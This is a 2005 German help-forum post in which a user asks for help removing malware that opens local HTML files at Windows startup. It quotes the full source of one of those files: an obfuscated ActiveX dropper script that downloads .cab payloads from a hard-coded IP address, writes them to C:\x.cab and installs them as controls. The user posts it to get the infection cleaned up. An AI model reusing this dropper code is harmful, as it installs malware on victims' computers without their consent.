Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Trojaner oder andere Schädlinge...

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Alt 11.05.2005, 23:58   #1
azazel_7
 
Trojaner oder andere Schädlinge... - Icon21

Trojaner oder andere Schädlinge...



Hi Leute!
Ich hab jetzt die letzten 2 Stunden damit verbracht, das Netz zu begoogeln und bin dennoch zu keinem Ergebnis gekommen.
Mein Problem ist, dass beim Start von Windows sich 2x der Firefox öffnet mit 2 lokalen .htm Dateien. Die eine heisst windows.htm, die andere update.htm. Ich habe bereits versucht, sie zu löschen, doch sie sind beim nächsten booten wieder da. Ich habe ausserdem bitdefender, spybot s&d, spysweeper und xp-antispy (was aber glaub nix dazu sagt) ausprobiert, alles ohne wirklichen Erfolg. Habe auch schon mit tuneup alles unnötige aus dem Autostart entfernt, aber zu meinem Trojaner/Virus/Wurm/... hat es nix gesagt...

Ich poste mal den Inhalt der windows.htm, welche die meines Erachtens nach die üblere der beiden ist, da die andere Seite bloss ein "File not found" faked und die windows.htm versucht auf die Platte zu schreiben. Also hier der Code der windows.htm:
Code:
ATTFilter
<HTML>
<HEAD>
<SCRIPT>

cust='6'
antivir='0';
mt='0';
lc='0';






	function dl(u) {

		try {

	        eval("x = new Activ"+"eXObject('Mic"+"rosoft.XM"+"LHTTP')"); 

    		x.Open("GET",u,0); 

    		x.Send(); 

			eval("s = new Activ"+"eXObject('ADOD"+"B.Stream')");

			eval("s.M"+"ode = 3");

			eval("s.T"+"ype = 1");

			eval("s.O"+"pen()");

			eval("s.W"+"rite(x.responseBody)");

			eval('s.S'+'aveToFile("C:\\\\x.cab",2)');

		}

		catch(ex) { }

	}





	dl('http://216.74.97.200/~techno/files/explorer'+cust+'.cab');

    

	</SCRIPT>

<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=i codeBase=c:/x.cab 
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>

		dl('http://216.74.97.200/~techno/files/777.cab');

    

	</SCRIPT>

<OBJECT id=i codeBase=c:/x.cab 
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>

	if (antivir == 0 && mt == 0) {

		dl('http://216.74.97.200/~techno/files/MediaTicketsInstaller.cab');



		num = new Array(13);

		num[0] = "4362";
		num[1] = "4362";
                num[2] = "4362";
                num[3] = "4362";
                num[4] = "4362";
                num[5] = "4362";
                num[6] = "4362";
                num[7] = "4362";
                num[8] = "4362";
                num[9] = "4362";
                num[10] = "4362";
                num[11] = "4362";
                num[12] = "4362";
		


		idN = Math.floor(Math.random() * num.length);

		document.write('<OBJECT ID="MediaTicketsInstallerDemo" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9EB320CE-BE1D-4304-A081-4B466'+'5414BEF" CODEBASE="c:/x.cab"><PARAM NAME="rid" VALUE='+num[idN]+'></OBJECT>');

	}



	</SCRIPT>
</BODY>
</HTML>
         
Es wäre schön wenn mir jemand damit weiterhelfen könnte. Den Inhalt des HijackThis logs wollte ich noch nicht posten, vielleicht gehts ja auch ohne. Aber bei Bedarf mach ich das natürlich gerne!
Danke schonmal im Voraus!
Grüßle, der Christian

 

Themen zu Trojaner oder andere Schädlinge...
autostart, bitdefender, booten, code, defender, entfernt, ergebnis, file, firefox, found, hijack, hijackthis, html, leute, löschen, not, platte, problem, script, seite, spybot, start, start von windows, trojaner, windows, öffnet




Ähnliche Themen: Trojaner oder andere Schädlinge...


  1. Windows 7: Adware/Verdacht auf andere Schädlinge
    Log-Analyse und Auswertung - 20.05.2015 (16)
  2. Win 8.1: Optimizer Pro und andere Schädlinge
    Log-Analyse und Auswertung - 13.12.2014 (28)
  3. PC Speed Maximizer und einige andere Schädlinge auf dem PC
    Plagegeister aller Art und deren Bekämpfung - 11.10.2014 (13)
  4. Babylon-Toolbar, BProtect-D und andere Schädlinge werde ich nicht los
    Log-Analyse und Auswertung - 26.07.2014 (11)
  5. Iminent und event. andere Schädlinge bei ABSOLUTEM PC AMATEUR eingefangen
    Plagegeister aller Art und deren Bekämpfung - 04.07.2014 (22)
  6. Windows 7 x64 sweet-page.com vollständig entfernt? evtl. andere schädlinge?
    Log-Analyse und Auswertung - 30.01.2014 (3)
  7. dsgsdgdsdgsdw.pad und andere Schädlinge gefunden und bereinigt, System jetzt OK?
    Plagegeister aller Art und deren Bekämpfung - 02.01.2013 (26)
  8. CRYPT.ZPACK.GEN2, JAVA.Ternub.gen und andere Schädlinge gefunden
    Plagegeister aller Art und deren Bekämpfung - 28.12.2012 (14)
  9. Google.de nicht erreichbar - andere Seiten sehr langsam - andere normal DNS-Provider Problem oder Trojaner?
    Log-Analyse und Auswertung - 05.09.2012 (2)
  10. Onlinezugang gesperrt - Trojaner Gosi, TAN-Fenster, andere Schädlinge ?
    Plagegeister aller Art und deren Bekämpfung - 08.02.2011 (39)
  11. Antimalware Doctor und andere Schädlinge entfernt (Ordner- und Suchoptionen deaktiviert)
    Log-Analyse und Auswertung - 27.08.2010 (4)
  12. b.exe und/oder andere Schädlinge
    Plagegeister aller Art und deren Bekämpfung - 01.09.2009 (3)
  13. Ich glaube ich habe Trojaner oder andere Schädlinge auf dem Rechner..
    Log-Analyse und Auswertung - 03.06.2009 (1)
  14. TR/Trash.Gen & andere Schädlinge - PC noch befallen&was tun?
    Plagegeister aller Art und deren Bekämpfung - 31.12.2008 (0)
  15. Trojaner Vundo und andere Schädlinge
    Plagegeister aller Art und deren Bekämpfung - 26.07.2008 (6)
  16. Virtuamonde und andere Schädlinge
    Mülltonne - 21.07.2008 (0)
  17. trojaner und andere schädlinge an bord, bitte um hilfe
    Log-Analyse und Auswertung - 04.02.2008 (7)

Zum Thema Trojaner oder andere Schädlinge... - Hi Leute! Ich hab jetzt die letzten 2 Stunden damit verbracht, das Netz zu begoogeln und bin dennoch zu keinem Ergebnis gekommen. Mein Problem ist, dass beim Start von Windows - Trojaner oder andere Schädlinge......
Archiv
Du betrachtest: Trojaner oder andere Schädlinge... auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.